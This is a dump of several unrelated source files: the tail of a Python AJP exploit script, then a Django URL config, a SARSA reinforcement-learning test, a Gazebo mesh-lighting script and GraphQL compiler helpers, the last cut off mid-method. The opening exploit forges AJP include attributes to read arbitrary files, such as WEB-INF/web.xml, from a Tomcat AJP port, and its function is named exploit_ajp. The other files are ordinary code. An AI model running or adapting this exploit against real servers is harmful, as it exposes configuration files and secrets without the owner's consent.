message.append(server_port_bytes)
message.append(is_ssl_bytes)
message.append(num_headers_bytes)
message.append(headers_ajp_bytes)
message.append(attributes_ajp_bytes)
message.append(b'\xff')
message_bytes = b''.join(message)
send_bytes = b'\x12\x34' + self.ajp_string(message_bytes)
return send_bytes
class AjpResponse(object):
def __init__(self, s, result, requesturl):
self.sock = s
self.result = result
self.requesturl = requesturl
self.body_start = False
self.common_response_headers = {
b'\x01': b'Content-Type',
b'\x02': b'Content-Language',
b'\x03': b'Content-Length',
b'\x04': b'Date',
b'\x05': b'Last-Modified',
b'\x06': b'Location',
b'\x07': b'Set-Cookie',
b'\x08': b'Set-Cookie2',
b'\x09': b'Servlet-Engine',
b'\x0a': b'Status',
b'\x0b': b'WWW-Authenticate',
}
def parse_response(self):
# first two bytes are the 'magic'
magic = self.recv(2)
# next two bytes are the length
data_len_int = self.read_int(2)
code_int = self.read_int(1)
if code_int == 3:
self.parse_send_body_chunk()
elif code_int == 4:
self.parse_headers()
elif code_int == 5:
self.parse_response_end()
return
self.parse_response()
def parse_headers(self):
status_int = self.read_int(2)
msg_bytes = self.read_string()
headers_number_int = self.read_int(2)
for i in range(headers_number_int):
# header name: two cases
first_byte = self.recv(1)
second_byte = self.recv(1)
if first_byte == b'\xa0':
header_key_bytes = self.common_response_headers[second_byte]
else:
header_len_bytes = first_byte + second_byte
header_len_int = int(codecs.encode(header_len_bytes, 'hex'), 16)
# header_len_int = int.from_bytes(header_len_bytes, byteorder='big')
header_key_bytes = self.read_bytes(header_len_int)
# consume the 0x00 terminator
self.recv(1)
header_value_bytes = self.read_string()
def parse_send_body_chunk(self):
if not self.body_start:
self.body_start = True
chunk = self.read_string()
self.result.append(chunk)
def parse_response_end(self):
self.sock.close()
def read_int(self, int_len):
return int(codecs.encode(self.recv(int_len), 'hex'), 16)
def read_bytes(self, bytes_len):
return self.recv(bytes_len)
def read_string(self, int_len=2):
data_len = self.read_int(int_len)
data = self.recv(data_len)
# consume the 0x00 terminator
end = self.recv(1)
return data
def recv(self, data_len):
data = self.sock.recv(data_len)
while len(data) < data_len:
data += self.sock.recv(data_len - len(data))
return data
class AjpShooter(object):
def __init__(self, args):
self.args = args
self.url = args.get('url')
self.method = args.get('method')
self.headers = args.get('headers')
self.ajp_port = args.get('ajp_port')
self.target_file = args.get('target_file')
self.shooter = 'read'
def shoot(self):
headers = self.transform_headers()
target_file = self.target_file.encode('utf8')
attributes = []
evil_req_attributes = [
(b'javax.servlet.include.request_uri', b'index'),
(b'javax.servlet.include.servlet_path', target_file)
]
for req_attr in evil_req_attributes:
attributes.append((b"req_attribute", req_attr))
if self.shooter == 'read':
self.url += '/index.txt'
else:
self.url += '/index.jsp'
ajp_ip = urlparse(self.url).hostname
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
s.connect((ajp_ip, self.ajp_port))
message = AjpRequest(self.url, self.method, headers, attributes).make_forward_request_package()
s.send(message)
result = []
AjpResponse(s, result, self.url).parse_response()
return b"".join(result)
def transform_headers(self):
new_headers = []
if self.headers:
for k, v in self.headers.items():
new_headers.append((k.lower().encode('utf8'), v.lower().encode('utf8')))
return new_headers
def exploit_ajp(url, ajp_port, target_file, method='GET', headers={}):
_ = {
'url': url,
'headers': headers,
'method': method,
'ajp_port': ajp_port,
'target_file': target_file if target_file.startswith("/") else "/" + target_file
}
try:
ret = AjpShooter(_).shoot()
return ret
except socket.timeout as e:
exit("[-] Connection ajp port [{}] error! socket timeout".format(ajp_port))
except socket.error as e:
print(exit("[-] Connection ajp port [{}] error! {}".format(ajp_port, e)))
except Exception as e:
import traceback
traceback.print_exc()
return None
if __name__ == "__main__":
print(exploit_ajp('http://127.0.0.1:8080', 8009, '/WEB-INF/web.xml'))
|
coderedcms/urls.py | fakegit/coderedcms | 526 | 11179725 | from django.urls import include, path, re_path
from wagtail.contrib.sitemaps.views import sitemap
from wagtail.core import urls as wagtailcore_urls
from coderedcms.settings import cr_settings
from coderedcms.views import (
event_generate_ical_for_calendar,
event_generate_recurring_ical_for_event,
event_generate_single_ical_for_event,
event_get_calendar_events,
favicon,
robots,
serve_protected_file
)
urlpatterns = [
# CodeRed custom URLs
re_path(r'^favicon\.ico$', favicon, name='codered_favicon'),
re_path(r'^robots\.txt$', robots, name='codered_robots'),
re_path(r'^sitemap\.xml$', sitemap, name='codered_sitemap'),
re_path(r'^{0}(?P<path>.*)$'.format(
cr_settings['PROTECTED_MEDIA_URL'].lstrip('/')),
serve_protected_file,
name="serve_protected_file"
),
# Event/Calendar URLs
path('ical/generate/single/', event_generate_single_ical_for_event,
name='event_generate_single_ical'),
path('ical/generate/recurring/', event_generate_recurring_ical_for_event,
name='event_generate_recurring_ical'),
path('ical/generate/calendar/', event_generate_ical_for_calendar,
name='event_generate_ical_for_calendar'),
path('ajax/calendar/events/', event_get_calendar_events, name='event_get_calendar_events'),
# Wagtail
re_path(r'', include(wagtailcore_urls)),
]
|
alf/algorithms/sarsa_algorithm_test.py | www2171668/alf | 175 | 11179749 | # Copyright (c) 2019 Horizon Robotics. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for sarsa_algorithm.py."""
from absl import logging
from absl.testing import parameterized
import functools
import torch
import alf
from alf.algorithms.actor_critic_algorithm import ActorCriticAlgorithm
from alf.algorithms.config import TrainerConfig
from alf.algorithms.ppo_algorithm_test import unroll
from alf.algorithms.sarsa_algorithm import SarsaAlgorithm
from alf.environments.suite_unittest import ActionType, PolicyUnittestEnv
from alf.networks import (ActorDistributionNetwork,
ActorDistributionRNNNetwork, ActorNetwork,
ActorRNNNetwork, StableNormalProjectionNetwork,
CriticNetwork, CriticRNNNetwork)
from alf.utils import common
from alf.utils.math_ops import clipped_exp
DEBUGGING = True
def _create_algorithm(env, sac, use_rnn, on_policy, priority_replay):
observation_spec = env.observation_spec()
action_spec = env.action_spec()
fc_layer_params = (16, 16)
continuous_projection_net_ctor = functools.partial(
alf.networks.NormalProjectionNetwork,
state_dependent_std=True,
scale_distribution=True,
std_transform=clipped_exp)
if use_rnn:
if sac:
actor_net = functools.partial(
ActorDistributionRNNNetwork,
fc_layer_params=fc_layer_params,
lstm_hidden_size=(4, ),
continuous_projection_net_ctor=continuous_projection_net_ctor)
else:
actor_net = functools.partial(
ActorRNNNetwork,
fc_layer_params=fc_layer_params,
lstm_hidden_size=(4, ))
critic_net = functools.partial(
CriticRNNNetwork,
joint_fc_layer_params=fc_layer_params,
lstm_hidden_size=(4, ))
else:
if sac:
actor_net = functools.partial(
ActorDistributionNetwork,
fc_layer_params=fc_layer_params,
continuous_projection_net_ctor=continuous_projection_net_ctor)
else:
actor_net = functools.partial(
ActorNetwork, fc_layer_params=fc_layer_params)
critic_net = functools.partial(
CriticNetwork, joint_fc_layer_params=fc_layer_params)
config = TrainerConfig(
root_dir="dummy",
unroll_length=2,
initial_collect_steps=12 * 128 * 5,
use_rollout_state=True,
mini_batch_length=1,
mini_batch_size=256,
num_updates_per_train_iter=1,
whole_replay_buffer_training=False,
clear_replay_buffer=False,
priority_replay=priority_replay,
debug_summaries=DEBUGGING,
summarize_grads_and_vars=DEBUGGING,
summarize_action_distributions=DEBUGGING)
return SarsaAlgorithm(
observation_spec=observation_spec,
action_spec=action_spec,
env=env,
config=config,
epsilon_greedy=0.1,
calculate_priority=priority_replay,
on_policy=on_policy,
ou_stddev=0.2,
ou_damping=0.5,
actor_network_ctor=actor_net,
critic_network_ctor=critic_net,
actor_optimizer=alf.optimizers.AdamTF(lr=5e-3),
critic_optimizer=alf.optimizers.AdamTF(lr=2e-2),
alpha_optimizer=alf.optimizers.AdamTF(lr=2e-2),
debug_summaries=DEBUGGING)
class SarsaTest(parameterized.TestCase, alf.test.TestCase):
# TODO: on_policy=True is very unstable, try to figure out the possible
# reason.
@parameterized.parameters(
dict(on_policy=False, sac=False), dict(on_policy=False, use_rnn=False),
dict(on_policy=False, use_rnn=True), dict(priority_replay=True))
def test_sarsa(self,
on_policy=False,
sac=True,
use_rnn=False,
priority_replay=False):
logging.info(
"sac=%d on_policy=%s use_rnn=%s" % (sac, on_policy, use_rnn))
env_class = PolicyUnittestEnv
iterations = 500
num_env = 128
if on_policy:
num_env = 128
steps_per_episode = 12
env = env_class(
num_env, steps_per_episode, action_type=ActionType.Continuous)
eval_env = env_class(
100, steps_per_episode, action_type=ActionType.Continuous)
algorithm = _create_algorithm(
env,
on_policy=on_policy,
sac=sac,
use_rnn=use_rnn,
priority_replay=priority_replay)
env.reset()
eval_env.reset()
for i in range(iterations):
algorithm.train_iter()
eval_env.reset()
eval_time_step = unroll(eval_env, algorithm, steps_per_episode - 1)
logging.log_every_n_seconds(
logging.INFO,
"%d reward=%f" % (i, float(eval_time_step.reward.mean())),
n_seconds=1)
self.assertAlmostEqual(
1.0, float(eval_time_step.reward.mean()), delta=0.3)
if __name__ == '__main__':
alf.test.main()
|
Simulator/gazebo_simulator/models/race_track/real_world/gate/meshes/set_gate_properties.py | 473867143/Prometheus | 1,217 | 11179766 | import argparse
import xml.etree.ElementTree as ET
def set_property(xml_root, name, value):
    # Update the colour of the named lighting field (e.g. "emission" or "ambient").
    for elem in xml_root.iter():
        if name in elem.tag:
            children = list(elem)  # Element.getchildren() was removed in Python 3.9
            if not children:
                raise IOError("Not found name {}".format(name))
            color = children[0]
            assert value >= 0, "invalid {} light".format(name)
            assert value <= 1, "invalid {} light".format(name)
            color.text = '{0} {0} {0} 1'.format(value)
return xml_root
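# For example (illustrative call, not part of the original script):
#   set_property(root, "ambient", 0.5) rewrites the text of the first child of
#   every element whose tag contains "ambient" to "0.5 0.5 0.5 1".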
def main(args):
tree = ET.parse(args.xml_file)
ET.register_namespace('', "http://www.collada.org/2005/11/COLLADASchema")
xml_root = tree.getroot()
if args.ambient:
set_property(xml_root, "ambient", args.ambient)
if args.emission:
set_property(xml_root, "emission", args.emission)
tree.write(args.xml_file, encoding="utf-8", xml_declaration=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Select gate illumination properties.')
parser.add_argument('-ambient', type=float, required=False)
parser.add_argument('-xml_file', type=str, default='gate.dae')
parser.add_argument('-emission', type=float, required=False)
args = parser.parse_args()
main(args)
|
graphql_compiler/compiler/helpers.py | kensho-technologies/graphql-compiler | 521 | 11179771 |
# Copyright 2017-present Kensho Technologies, LLC.
"""Common helper objects, base classes and methods."""
from abc import ABCMeta, abstractmethod
from collections import namedtuple
from functools import total_ordering
import string
from typing import Any, Collection, Dict, Hashable, Iterable, Optional, Tuple, TypeVar, Union, cast
import funcy
from graphql import GraphQLNonNull, GraphQLString, is_type
from graphql.language.ast import ArgumentNode
from graphql.type.definition import (
GraphQLInterfaceType,
GraphQLList,
GraphQLObjectType,
GraphQLOutputType,
GraphQLUnionType,
)
import six
from ..exceptions import GraphQLCompilationError
from ..global_utils import VertexPath
from ..schema import (
INBOUND_EDGE_FIELD_PREFIX,
OUTBOUND_EDGE_FIELD_PREFIX,
TYPENAME_META_FIELD_NAME,
is_vertex_field_name,
)
# These are the Java (OrientDB) representations of the ISO-8601 standard date and datetime formats.
STANDARD_DATE_FORMAT = "yyyy-MM-dd"
STANDARD_DATETIME_FORMAT = "yyyy-MM-dd'T'HH:mm:ss"
VARIABLE_ALLOWED_CHARS = frozenset(six.text_type(string.ascii_letters + string.digits + "_"))
OUTBOUND_EDGE_DIRECTION = "out"
INBOUND_EDGE_DIRECTION = "in"
ALLOWED_EDGE_DIRECTIONS = frozenset({OUTBOUND_EDGE_DIRECTION, INBOUND_EDGE_DIRECTION})
FilterOperationInfo = namedtuple(
"FilterOperationInfo", ("directive", "field_ast", "field_name", "field_type")
)
T = TypeVar("T")
QueryPath = Tuple[str, ...]
FoldPath = Tuple[Tuple[str, str], ...]
def get_only_element_from_collection(one_element_collection: Collection[T]) -> T:
"""Assert that the collection has exactly one element, then return that element."""
if len(one_element_collection) != 1:
raise AssertionError(
"Expected a collection with exactly one element, but got: {}".format(
one_element_collection
)
)
return funcy.first(one_element_collection)
def get_field_type_from_schema(
schema_type: Union[GraphQLInterfaceType, GraphQLObjectType], field_name: str
) -> GraphQLOutputType:
"""Return the type of the field in the given type, accounting for field name normalization."""
if field_name == TYPENAME_META_FIELD_NAME:
return GraphQLString
else:
if field_name not in schema_type.fields:
raise AssertionError(
"Field {} passed validation but was not present on type "
"{}".format(field_name, schema_type)
)
# Validation guarantees that the field must exist in the schema.
return schema_type.fields[field_name].type
def get_vertex_field_type(
current_schema_type: Union[GraphQLInterfaceType, GraphQLObjectType], vertex_field_name: str
) -> Union[GraphQLInterfaceType, GraphQLObjectType]:
"""Return the type of the vertex within the specified vertex field name of the given type."""
# According to the schema, the vertex field itself is of type GraphQLList, and this is
# what get_field_type_from_schema returns. We care about what the type *inside* the list is,
# i.e., the type on the other side of the edge (hence .of_type).
# Validation guarantees that the field must exist in the schema.
if not is_vertex_field_name(vertex_field_name):
raise AssertionError(
"Trying to load the vertex field type of a non-vertex field: "
"{} {}".format(current_schema_type, vertex_field_name)
)
raw_field_type = get_field_type_from_schema(current_schema_type, vertex_field_name)
if not isinstance(strip_non_null_from_type(raw_field_type), GraphQLList):
raise AssertionError(
"Found an edge whose schema type was not GraphQLList: "
"{} {} {}".format(current_schema_type, vertex_field_name, raw_field_type)
)
field_type = cast(GraphQLList[Union[GraphQLInterfaceType, GraphQLObjectType]], raw_field_type)
return field_type.of_type
def strip_non_null_from_type(graphql_type: GraphQLOutputType) -> Any:
"""Return the GraphQL type stripped of its GraphQLNonNull annotations."""
while isinstance(graphql_type, GraphQLNonNull):
graphql_type = graphql_type.of_type
return graphql_type
def strip_non_null_and_list_from_type(graphql_type: GraphQLOutputType) -> Any:
"""Return the GraphQL type stripped of its GraphQLNonNull and GraphQLList annotations."""
while isinstance(graphql_type, (GraphQLNonNull, GraphQLList)):
graphql_type = graphql_type.of_type
return graphql_type
def get_edge_direction_and_name(vertex_field_name: str) -> Tuple[str, str]:
"""Get the edge direction and name from a non-root vertex field name."""
edge_direction = None
edge_name = None
if vertex_field_name.startswith(OUTBOUND_EDGE_FIELD_PREFIX):
edge_direction = OUTBOUND_EDGE_DIRECTION
edge_name = vertex_field_name[len(OUTBOUND_EDGE_FIELD_PREFIX) :]
elif vertex_field_name.startswith(INBOUND_EDGE_FIELD_PREFIX):
edge_direction = INBOUND_EDGE_DIRECTION
edge_name = vertex_field_name[len(INBOUND_EDGE_FIELD_PREFIX) :]
else:
raise AssertionError("Unreachable condition reached:", vertex_field_name)
validate_safe_string(edge_name)
return edge_direction, edge_name
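# A quick sketch, assuming the schema's standard "out_"/"in_" vertex field prefixes:
#   get_edge_direction_and_name("out_Animal_ParentOf") -> ("out", "Animal_ParentOf")
#   get_edge_direction_and_name("in_Animal_ParentOf")  -> ("in", "Animal_ParentOf")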
def is_vertex_field_type(graphql_type: GraphQLOutputType) -> bool:
"""Return True if the argument is a vertex field type, and False otherwise."""
# This will need to change if we ever support complex embedded types or edge field types.
underlying_type = strip_non_null_from_type(graphql_type)
return isinstance(underlying_type, (GraphQLInterfaceType, GraphQLObjectType, GraphQLUnionType))
def is_graphql_type(graphql_type: Any) -> bool:
"""Return True if the argument is a GraphQL type object, and False otherwise."""
# Helper function to work around the fact that "is_type" is a poorly-named function.
return is_type(graphql_type)
def ensure_unicode_string(value: str) -> str:
"""Ensure the value is a string, and return it as unicode."""
if not isinstance(value, six.string_types):
raise TypeError("Expected string value, got: {}".format(value))
return six.text_type(value)
def get_uniquely_named_objects_by_name(
object_list: Iterable[ArgumentNode],
) -> Dict[str, ArgumentNode]:
"""Return dict of name -> object pairs from a list of objects with unique names.
Args:
object_list: iterable of AST argument nodes, each X of which
has a unique name accessible as X.name.value
Returns:
dict, { X.name.value: X for x in object_list }
If the list is empty or None, returns an empty dict.
"""
if not object_list:
return dict()
result: Dict[str, ArgumentNode] = dict()
for obj in object_list:
name = obj.name.value
if name in result:
raise GraphQLCompilationError(
"Found duplicate object key: {} {}".format(name, object_list)
)
result[name] = obj
return result
def safe_quoted_string(value: str) -> str:
"""Return the provided string, surrounded by single quotes. Ensure string is safe."""
validate_safe_string(value)
return "'{}'".format(value)
def safe_or_special_quoted_string(value: str) -> str:
"""Return the provided string, surrounded by single quotes. Ensure string is safe or special."""
validate_safe_or_special_string(value)
return "'{}'".format(value)
def validate_safe_or_special_string(value: str, value_description: str = "string") -> None:
"""Ensure the string does not have illegal characters or is in a set of allowed strings."""
# The following strings are explicitly allowed, despite having otherwise-illegal chars.
legal_strings_with_special_chars = frozenset({"@rid", "@class", "@this", "%"})
if value not in legal_strings_with_special_chars:
validate_safe_string(value, value_description=value_description)
def validate_safe_string(value: str, value_description: str = "string") -> None:
"""Ensure that the provided string not have illegal characters."""
if not value:
raise GraphQLCompilationError("Empty {}s are not allowed!".format(value_description))
if value[0] in string.digits:
raise GraphQLCompilationError(
"Encountered invalid {}: {}. It cannot start with a "
"digit.".format(value_description, value)
)
# set(value) is used instead of frozenset(value) to avoid printing 'frozenset' in error message.
disallowed_chars = set(value) - VARIABLE_ALLOWED_CHARS
if disallowed_chars:
raise GraphQLCompilationError(
"Encountered illegal characters {} in {}: {}. It is only "
"allowed to have upper and lower case letters, "
"digits and underscores.".format(disallowed_chars, value_description, value)
)
def validate_runtime_argument_name(name: str) -> None:
"""Ensure that the provided string is valid for use as a runtime argument name."""
validate_safe_string(name, value_description="runtime argument name")
def validate_tagged_argument_name(name: str) -> None:
"""Ensure that provided string is valid for use as a tagged argument name."""
validate_safe_string(name, value_description="tagged argument name")
def validate_output_name(name: str) -> None:
"""Ensure that the provided string is valid for use as an output name."""
internal_name_prefix = "___"
if name.startswith(internal_name_prefix):
raise GraphQLCompilationError(
'The prefix "___" (three underscores) for output names is reserved by the compiler.'
)
validate_safe_string(name, value_description="output name")
def validate_edge_direction(edge_direction: str) -> None:
"""Ensure the provided edge direction is either "in" or "out"."""
if not isinstance(edge_direction, six.string_types):
raise TypeError(
"Expected string edge_direction, got: {} {}".format(
type(edge_direction), edge_direction
)
)
if edge_direction not in ALLOWED_EDGE_DIRECTIONS:
raise ValueError("Unrecognized edge direction: {}".format(edge_direction))
def validate_marked_location(location: "BaseLocation") -> None:
"""Validate that a Location object is safe for marking, and not at a field."""
if not isinstance(location, BaseLocation):
raise TypeError(
"Expected a BaseLocation, got: {} {}".format(type(location).__name__, location)
)
if location.field is not None:
raise GraphQLCompilationError("Cannot mark location at a field: {}".format(location))
def _create_fold_path_component(edge_direction: str, edge_name: str) -> Tuple[Tuple[str, str], ...]:
"""Return a tuple representing a fold_path component of a FoldScopeLocation."""
return ((edge_direction, edge_name),) # tuple containing a tuple of two elements
KeyT = TypeVar("KeyT", bound=Hashable)
ValueT = TypeVar("ValueT", bound=Hashable)
def invert_dict(invertible_dict: Dict[KeyT, ValueT]) -> Dict[ValueT, KeyT]:
"""Invert a dict. A dict is invertible if values are unique and hashable."""
inverted: Dict[ValueT, KeyT] = {}
for k, v in six.iteritems(invertible_dict):
if not isinstance(v, Hashable):
raise TypeError(
"Expected an invertible dict, but value at key {} has type {}".format(
k, type(v).__name__
)
)
if v in inverted:
raise TypeError(
"Expected an invertible dict, but keys "
"{} and {} map to the same value".format(inverted[v], k)
)
inverted[v] = k
return inverted
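# For example (illustrative): invert_dict({"a": 1, "b": 2}) returns {1: "a", 2: "b"},
# while invert_dict({"a": 1, "b": 1}) raises TypeError because two keys map to one value.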
def is_runtime_parameter(argument: str) -> bool:
"""Return True if the directive argument defines a runtime parameter, and False otherwise."""
return argument.startswith("$")
def is_tagged_parameter(argument: str) -> bool:
"""Return True if the directive argument defines a tagged parameter, and False otherwise."""
return argument.startswith("%")
def get_parameter_name(argument: str) -> str:
"""Return the name of the parameter without the leading prefix."""
if argument[0] not in {"$", "%"}:
raise AssertionError(
"Unexpectedly received an unprefixed parameter name, unable to "
"determine whether it is a runtime or tagged parameter: {}".format(argument)
)
return argument[1:]
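# For example (illustrative): get_parameter_name("$min_worth") returns "min_worth"
# (a runtime parameter), and get_parameter_name("%tagged_value") returns "tagged_value"
# (a tagged parameter).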
LocationT = TypeVar("LocationT", bound="BaseLocation")
# Issue below might be due to https://github.com/python/mypy/issues/5374
# Feel free to remove this mypy exception if you get mypy to pass
@total_ordering # type: ignore
@six.add_metaclass(ABCMeta)
class BaseLocation(object):
"""An abstract location object, describing a location in the GraphQL query."""
field: Optional[str]
@abstractmethod
def navigate_to_field(self: LocationT, field: str) -> LocationT:
"""Return a new BaseLocation object at the specified field of the current BaseLocation."""
raise NotImplementedError()
@abstractmethod
def at_vertex(self: LocationT) -> LocationT:
"""Get the BaseLocation ignoring its field component."""
raise NotImplementedError()
@abstractmethod
def navigate_to_subpath(self: LocationT, child: str) -> LocationT:
"""Return a new BaseLocation after a traversal to the specified child location."""
raise NotImplementedError()
@abstractmethod
def get_location_name(self) -> Tuple[str, Optional[str]]:
"""Return a tuple of a unique name of the location, and the current field name (or None)."""
raise NotImplementedError()
def get_location_at_field_name(self) -> Tuple[str, str]:
"""Assert the location is at a field, then return the same value as get_location_name()."""
mark_name, field_name = self.get_location_name()
if field_name is None:
raise AssertionError(
"Expected the location {} to be at a field, but it was not."
"This is a bug.".format(self)
)
return (mark_name, field_name)
@abstractmethod
def _check_if_object_of_same_type_is_smaller(self: LocationT, other: LocationT) -> bool:
"""Return True if the other object is smaller than self in the total ordering."""
raise NotImplementedError()
@abstractmethod
def __eq__(self, other: Any) -> bool:
"""Return True if the BaseLocations are equal, and False otherwise."""
raise NotImplementedError()
def __lt__(self, other: "BaseLocation") -> bool:
"""Return True if the other object is smaller than self in the total ordering."""
if isinstance(self, Location) and isinstance(other, Location):
return self._check_if_object_of_same_type_is_smaller(other)
elif isinstance(self, FoldScopeLocation) and isinstance(other, FoldScopeLocation):
return self._check_if_object_of_same_type_is_smaller(other)
elif isinstance(self, Location) and isinstance(other, FoldScopeLocation):
return _compare_location_and_fold_scope_location(self, other)
elif isinstance(self, FoldScopeLocation) and isinstance(other, Location):
return not _compare_location_and_fold_scope_location(other, self)
else:
raise AssertionError(
"Received objects of types {}, {} in BaseLocation comparison. "
"Only Location and FoldScopeLocation are allowed: {} {}".format(
type(self).__name__, type(other).__name__, self, other
)
)
@six.python_2_unicode_compatible
class Location(BaseLocation):
"""A location in the GraphQL query, anywhere except within a @fold scope."""
query_path: QueryPath
visit_counter: int
def __init__(
self, query_path: Tuple[str, ...], field: Optional[str] = None, visit_counter: int = 1
) -> None:
"""Create a new Location object.
Used to uniquely identify locations in the graph traversal, with three components.
- The 'query_path' is a tuple containing the in-order nested set of vertex fields where
the Location is.
- The 'field' is a string set to the name of a property field, if the
Location is at a property field, or None otherwise.
- The 'visit_counter' is a counter that disambiguates between consecutive,
but semantically different, visits to the same 'query_path' and 'field'.
In the following example, note that the Location objects for 'X' and 'Y'
have identical values for both 'query_path' (empty tuple) and 'field' (None),
but are not semantically equivalent:
g.as('X').out('foo').back('X').as('Y').out('bar').optional('Y')
The difference between 'X' and 'Y' is in the .optional() statement --
.optional('Y') says that the 'bar' edge is optional, and .optional('X') says that
both 'foo' and 'bar' are optional. Hence, the Location objects for 'X' and 'Y'
should have different 'visit_counter' values.
Args:
query_path: tuple of strings, in-order, one for each vertex in the
current nested position in the graph
field: string if at a field in a vertex, or None if at a vertex
visit_counter: int, number that allows semantic disambiguation of otherwise equivalent
Location objects -- see the explanation above.
Returns:
new Location object with the provided properties
"""
if not isinstance(query_path, tuple):
raise TypeError(
"Expected query_path to be a tuple, was: "
"{} {}".format(type(query_path).__name__, query_path)
)
if field and not isinstance(field, six.string_types):
raise TypeError(
"Expected field to be None or string, was: "
"{} {}".format(type(field).__name__, field)
)
self.query_path = query_path
self.field = field
# A single visit counter is enough, rather than a visit counter per path level,
# because field names are unique -- one can't be at path 'X' and
# visit 'Y' in two different ways to generate colliding 'X__Y___1' identifiers.
self.visit_counter = visit_counter
def navigate_to_field(self, field: str) -> "Location":
"""Return a new Location object at the specified field of the current Location's vertex."""
if self.field:
raise AssertionError("Already at a field, cannot nest fields: {}".format(self))
return Location(self.query_path, field=field, visit_counter=self.visit_counter)
def at_vertex(self) -> "Location":
"""Get the Location ignoring its field component."""
if not self.field:
return self
return Location(self.query_path, field=None, visit_counter=self.visit_counter)
def navigate_to_subpath(self, child: str) -> "Location":
"""Return a new Location object at a child vertex of the current Location's vertex."""
if not isinstance(child, six.string_types):
raise TypeError("Expected child to be a string, was: {}".format(child))
if self.field:
raise AssertionError("Currently at a field, cannot go to child: {}".format(self))
return Location(self.query_path + (child,))
def navigate_to_fold(self, folded_child: str) -> "FoldScopeLocation":
"""Return a new FoldScopeLocation for the folded child vertex of the current Location."""
if not isinstance(folded_child, six.string_types):
raise TypeError("Expected folded_child to be a string, was: {}".format(folded_child))
if self.field:
raise AssertionError("Currently at a field, cannot go to folded child: {}".format(self))
edge_direction, edge_name = get_edge_direction_and_name(folded_child)
fold_path = _create_fold_path_component(edge_direction, edge_name)
return FoldScopeLocation(self, fold_path)
def revisit(self) -> "Location":
"""Return a new Location object with an incremented 'visit_counter'."""
if self.field:
raise AssertionError("Attempted to revisit a location at a field: {}".format(self))
return Location(self.query_path, field=None, visit_counter=(self.visit_counter + 1))
def get_location_name(self) -> Tuple[str, Optional[str]]:
"""Return a tuple of a unique name of the Location, and the current field name (or None)."""
mark_name = "__".join(self.query_path) + "___" + six.text_type(self.visit_counter)
return (mark_name, self.field)
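    # Naming sketch (illustrative values): Location(("Animal",)) yields the mark
    # name "Animal___1"; after .revisit() the same query_path yields "Animal___2",
    # keeping consecutive visits to one path distinguishable downstream.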
def is_revisited_at(self, other_location: BaseLocation) -> bool:
"""Return True if other_location is a revisit of this location, and False otherwise."""
# Note that FoldScopeLocation objects cannot revisit Location objects, or each other.
return (
isinstance(other_location, Location)
and self.query_path == other_location.query_path
and self.visit_counter < other_location.visit_counter
)
def __str__(self) -> str:
"""Return a human-readable str representation of the Location object."""
return "Location({}, {}, {})".format(self.query_path, self.field, self.visit_counter)
def __repr__(self) -> str:
"""Return a human-readable str representation of the Location object."""
return self.__str__()
def __eq__(self, other: Any) -> bool:
"""Return True if the Locations are equal, and False otherwise."""
return (
type(self) == type(other)
and self.query_path == other.query_path
and self.field == other.field
and self.visit_counter == other.visit_counter
)
def __ne__(self, other: Any) -> bool:
"""Check another object for non-equality against this one."""
return not self.__eq__(other)
def _check_if_object_of_same_type_is_smaller(self, other: "Location") -> bool:
"""Return True if the other object is smaller than self in the total ordering."""
if not isinstance(other, Location):
raise AssertionError(
"Expected Location type for other. Received {}: {}".format(
type(other).__name__, other
)
)
if len(self.query_path) != len(other.query_path):
return len(self.query_path) < len(other.query_path)
if self.query_path != other.query_path:
return self.query_path < other.query_path
if self.visit_counter != other.visit_counter:
return self.visit_counter < other.visit_counter
if self.field is None:
return other.field is not None
if other.field is None:
return False
return self.field < other.field
def __hash__(self) -> int:
"""Return the object's hash value."""
return hash(self.query_path) ^ hash(self.field) ^ hash(self.visit_counter)
@six.python_2_unicode_compatible
class FoldScopeLocation(BaseLocation):
"""A location within a @fold scope."""
base_location: Location
fold_path: FoldPath
def __init__(
self,
base_location: Location,
fold_path: Tuple[Tuple[str, str], ...],
field: Optional[str] = None,
) -> None:
"""Create a new FoldScopeLocation object. Used to represent the locations of @fold scopes.
Args:
base_location: Location object defining where the @fold scope is rooted. In other words,
the location of the tightest scope that fully contains the @fold scope.
fold_path: tuple of (edge_direction, edge_name) tuples, containing the traversal path
of the fold, starting from the base_location of the @fold scope.
field: string if at a field in a vertex, or None if at a vertex
Returns:
new FoldScopeLocation object
"""
if not isinstance(base_location, Location):
raise TypeError(
"Expected a Location for base_location, got: "
"{} {}".format(type(base_location), base_location)
)
if base_location.field:
raise ValueError(
"Expected Location object that points to a vertex, got: {}".format(base_location)
)
if not isinstance(fold_path, tuple) or len(fold_path) == 0:
raise TypeError(
"Expected fold_path to be a non-empty tuple, but got: {} {}".format(
type(fold_path), fold_path
)
)
fold_path_is_valid = all(
len(element) == 2 and element[0] in ALLOWED_EDGE_DIRECTIONS for element in fold_path
)
if not fold_path_is_valid:
raise ValueError("Encountered an invalid fold_path: {}".format(fold_path))
self.base_location = base_location
self.fold_path = fold_path
self.field = field
def get_location_name(self) -> Tuple[str, Optional[str]]:
"""Return a tuple of a unique name of the location, and the current field name (or None)."""
# We currently require that all outputs from a given fold are from the same location:
# any given fold has one set of traversals away from the root, and all outputs are
# at the tip of the set of traversals.
#
# Therefore, for the purposes of creating a unique edge name, it's sufficient to take
# only one traversal from the root of the fold. This allows fold names to be shorter.
first_folded_edge_direction, first_folded_edge_name = self.get_first_folded_edge()
unique_name = "".join(
(
self.base_location.get_location_name()[0],
"___",
first_folded_edge_direction,
"_",
first_folded_edge_name,
)
)
return (unique_name, self.field)
def get_first_folded_edge(self) -> Tuple[str, str]:
"""Return a tuple representing the first folded edge within the fold scope."""
# The constructor of this object guarantees that the fold has at least one traversal,
# so the [0]-indexing is guaranteed to not raise an exception.
first_folded_edge_direction, first_folded_edge_name = self.fold_path[0]
return first_folded_edge_direction, first_folded_edge_name
def at_vertex(self) -> "FoldScopeLocation":
"""Get the FoldScopeLocation ignoring its field component."""
if not self.field:
return self
return FoldScopeLocation(self.base_location, self.fold_path, field=None)
def navigate_to_field(self, field: str) -> "FoldScopeLocation":
"""Return a new location object at the specified field of the current location."""
if self.field:
